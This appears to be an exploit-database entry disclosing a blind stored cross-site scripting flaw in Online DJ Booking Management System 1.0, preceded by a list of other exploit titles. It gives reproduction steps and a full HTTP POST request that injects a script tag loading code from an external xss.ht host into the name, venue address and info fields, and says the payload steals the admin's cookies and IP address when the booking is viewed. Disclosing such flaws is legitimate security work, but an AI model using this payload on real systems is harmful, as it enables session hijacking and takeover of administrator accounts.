
8 changes to exploits/shellcodes Google SLO-Generator 2.0.0 - Code Execution Apache HTTP Server 2.4.49 - Path Traversal Apache HTTP Server 2.4.49 - Path Traversal & Remote Code Execution (RCE) Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting Online Traffic Offense Management System 1.0 - Multiple SQL Injection (Unauthenticated) Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated) Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated) Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass Windows/x86 - Bind TCP shellcode / Dynamic PEB & EDT method null-free Shellcode (415 bytes)
49 lines
No EOL
2 KiB
Text
49 lines
No EOL
2 KiB
Text
# Exploit Title: Online DJ Booking Management System 1.0 - 'Multiple' Blind Cross-Site Scripting
|
|
# Date: 2021-10-06
|
|
# Exploit Author: Yash Mahajan
|
|
# Vendor Homepage: https://phpgurukul.com/
|
|
# Software Link: https://phpgurukul.com/online-dj-booking-management-system-using-php-and-mysql/
|
|
# Version: V 1.0
|
|
# Vulnerable endpoint: http://localhost/odms/book-services.php?bookid=1
|
|
# Vulnerable Page URI : http://localhost/odms/admin/view-booking-detail.php?editid=10&&bookingid=989913724
|
|
# Tested on Windows 10, XAMPP
|
|
|
|
*Steps to Reproduce:*
|
|
1) Navigate http://localhost/odms/book-services.php?bookid=1
|
|
2) Enter Blind Xss payload `"><script+src=https://yourxsshunterusername.xss.ht>` in "name=","vaddress=" and "addinfo=" parameters and click on "Book".
|
|
|
|
Request:
|
|
========
|
|
|
|
POST /odms/book-services.php?bookid=1 HTTP/1.1
|
|
Host: localhost
|
|
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
|
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
|
|
Accept-Language: en-US,en;q=0.5
|
|
Accept-Encoding: gzip, deflate
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Content-Length: 335
|
|
Origin: http://localhost
|
|
Connection: close
|
|
Referer: http://localhost/odms/book-services.php?bookid=1
|
|
Cookie: PHPSESSID=crj216nrjq751tt0gs4o92undb
|
|
Upgrade-Insecure-Requests: 1
|
|
Sec-Fetch-Dest: document
|
|
Sec-Fetch-Mode: navigate
|
|
Sec-Fetch-Site: same-origin
|
|
Sec-Fetch-User: ?1
|
|
|
|
name="><script+src=https://biest.xss.ht></script>&email=aa@gg.com&mobnum=9999999999
|
|
&edate=2000-10-24&est=6+p.m&eetime=1+p.m&vaddress="><script+src=https://biest.xss.ht></script>
|
|
&eventtype=Pre+Engagement&addinfo="><script+src=https://biest.xss.ht></script>&submit=Book
|
|
|
|
|
|
Now to confirm the vulnerability
|
|
|
|
3) Login as admin by navigating to http://localhost/odms/admin/login.php.
|
|
4) Now as soon as admin visits /view-booking-detail.php to approve the booking, payload fires and attacker will get the details like ip address, cookies of admin
|
|
5) Able to steal admin's cookies successfully!!
|
|
|
|
#POC
|
|
https://ibb.co/Vj3jn2d
|
|
https://ibb.co/bm9MGdG |